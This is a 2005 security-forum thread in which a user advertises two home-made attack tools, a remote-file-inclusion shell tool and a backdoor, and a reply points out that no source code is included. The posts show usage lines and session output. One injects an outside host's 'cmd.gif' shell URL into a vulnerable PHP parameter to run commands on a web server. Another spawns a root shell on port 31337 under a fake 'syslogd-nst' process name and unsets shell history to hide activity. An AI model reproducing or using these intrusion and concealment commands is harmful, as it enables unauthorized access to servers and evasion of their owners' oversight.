 |
|
 |
 |
Menu |
 |
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
 |
User Info |
 |
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 506
Members: 0
Total: 506
|
|
|
|
|
 |
Full disclosure |
 |
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
2 stupid programs but useful |
 |
Posted: Sat Apr 16, 2005 2:59 pm |
|
|
HaCkZataN |
Regular user |

 |
|
Joined: Feb 23, 2005 |
Posts: 11 |
|
|
|
 |
 |
 |
|
jajaj ok i know most of u r going to say that is lame mmm but well trying coding one...
Peace
NST-RFITool
Code: | /*
Name: NST-RFITool v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN <hck_zatan@hotmail.com>
Date: 02/04/05
Description: RFI Tool as well. Remote :) With shell :) =)
root@NeoSecurity:/home/hackzatan# ./NST-RFITool
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
[+] Usage: ./NST-RFITool <Host> <Archivo_Rfi> <cmd> <Shell_or_Command>
[+] example: ./NST-RFITool localhost /index.php "?&cmd=" "http://host.com/shell.gif"
[+] http://localhost/index.php?&cmd=id
['] Or you could use
[+] http://localhost/index.php?&cmd=http://host.com/shell.gif
root@NeoSecurity:/home/hackzatan# ./NST-RFITool localhost /index.php "?&cmd=" "http://saure.lithyum.org/0/cmd.gif?&cmd="
[+] NST-RFITool v0.1 by HaCkZaTaN
[+] NeoSecurity
Starting NST-Shell...
(ctrl+c to exit)
Connecting localhost:80
NShell> id;uname -a;uptime;ls
uid=99(nobody) gid=98(nobody) groups=98(nobody)
Linux NeoSecurity 2.4.29 #6 Thu Jan 20 16:30:37 PST 2005 i686 unknown unknown GNU/Linux
21:40:51 up 11:33, 1 user, load average: 0.00, 0.02, 0.00
apache_pb.gif
index.php
END
NShell>
root@NeoSecurity:/home/hackzatan#
Under GPL
I accept no responsibilty for any damage caused by it.
Additons and fixes always welcome.
*/ |
NST-Backdoor
Code: | /*
Name: NST-Backdoor v0.1
Copyright: NeoSecurity
Author: HaCkZaTaN
Date: 31/03/05 17:51
Description: Backdoor!!
root@NeoSecurity:/home/hackzatan# pico NST-Backdoor.c
root@NeoSecurity:/home/hackzatan# gcc NST-Backdoor.c -o NST-Backdoor
root@NeoSecurity:/home/hackzatan# ./NST-Backdooor
[+] NST-Backdoor v0.1 by HaCkZaTaN
[+] NeoSecurity
[*] Usage: ./NST-Backdoor <port>
root@NeoSecurity:/home/hackzatan# ./NST-Backdoor 31337
[+] NST-Backdoor v0.1 by HaCkZaTaN
[*] Connecting...
[*] Spawning Shell on port 31337. PID is 1887.
root@NeoSecurity:/home/hackzatan# ps -aux | grep syslogd-nst
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
root 1888 0.0 0.5 1256 344 pts/0 S 18:46 0:00 syslogd-nst oor 31337
root@NeoSecurity:/home/hackzatan# telnet localhost 31337
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
NST-Backdoor v0.1 - Have a lot of fun..
"export TERM=xterm; unset HISTFILE; unset SAVEHIST"sh-3.00#
sh-3.00# sh-3.00# export TERM=xterm; unset HISTFILE; unset SAVEHIST
sh-3.00# sh-3.00# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy)
sh-3.00# sh-3.00#
*/ |
|
|
|
|
|
 |
 |
|
 |
Posted: Sun Apr 17, 2005 5:40 am |
|
|
y3dips |
Valuable expert |

 |
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
 |
 |
 |
|
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
Posted: Sun Apr 17, 2005 5:50 am |
|
|
HaCkZataN |
Regular user |

 |
|
Joined: Feb 23, 2005 |
Posts: 11 |
|
|
|
 |
 |
 |
|
|
|
|
|
Posted: Sun Apr 17, 2005 6:05 am |
|
|
y3dips |
Valuable expert |

 |
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
 |
 |
 |
|
sorry bout that,
coz i just see you put a detailed how to use it in "[code]" place ,n it would be great if u put the real code in "[code]" place, so we could see a source code.
but its oke
peace too |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|